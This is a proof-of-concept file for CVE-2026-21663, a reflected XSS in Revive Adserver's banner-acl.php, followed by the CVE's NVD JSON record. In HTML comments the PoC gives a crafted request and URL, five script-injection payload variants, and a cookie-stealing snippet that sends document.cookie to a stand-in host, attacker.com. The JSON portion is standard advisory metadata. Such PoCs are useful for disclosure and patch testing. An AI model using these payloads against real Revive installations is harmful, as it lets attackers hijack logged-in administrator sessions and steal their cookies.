CVE-2026-21663

<!-- CVE-2026-21663 Reflected XSS PoC for Revive Adserver banner-acl.php --> <!-- Target: Revive Adserver banner-acl.php script --> <!-- This PoC demonstrates the reflected XSS vulnerability --> <!-- Basic XSS PoC --> <!-- Replace [TARGET_URL] with the actual Revive Adserver URL --> <!-- GET /banner-acl.php?whatever=<script>alert(document.cookie)</script> HTTP/1.1 Host: [TARGET_URL] Cookie: [ADMIN_SESSION_COOKIE] --> <!-- Example malicious URL --> <!-- http://vulnerable-server/revive-adserver/banner-acl.php?aclId=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E --> <!-- HTML Injection PoC variants --> <!-- 1. <script>alert(String.fromCharCode(88,83,83))</script> 2. <img src=x onerror=alert('XSS')> 3. <svg/onload=alert('XSS')> 4. <iframe src="javascript:alert('XSS')"> 5. <body onload=alert('XSS')> --> <!-- Cookie Stealing PoC --> <!-- <script> fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie)) </script> --> <!-- Notes: - This is a reflected XSS, so the payload is in the URL query parameter - Requires authenticated admin user to click the malicious link - The payload gets reflected in the response without sanitization -->

{"cve": {"id": "CVE-2026-21663", "sourceIdentifier": "[email protected]", "published": "2026-01-20T21:16:06.443", "lastModified": "2026-02-03T21:05:31.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HackerOne community member Patrick Lang (7yr) has reported a reflected XSS vulnerability in the banner-acl.php script of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed."}, {"lang": "es", "value": "El miembro de la comunidad de HackerOne Patrick Lang (7yr) ha informado de una vulnerabilidad de XSS reflejado en el script banner-acl.php de Revive Adserver. Un atacante puede crear una URL específica que incluye una carga útil HTML en un parámetro. Si un administrador con sesión iniciada visita la URL, el HTML se envía al navegador y los scripts maliciosos se ejecutarían."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.4", "matchCriteriaId": "2AA08D1C-3638-4E0D-AC58-A8527E77536F"}]}]}], "references": [{"url": "https://hackerone.com/reports/3473696", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}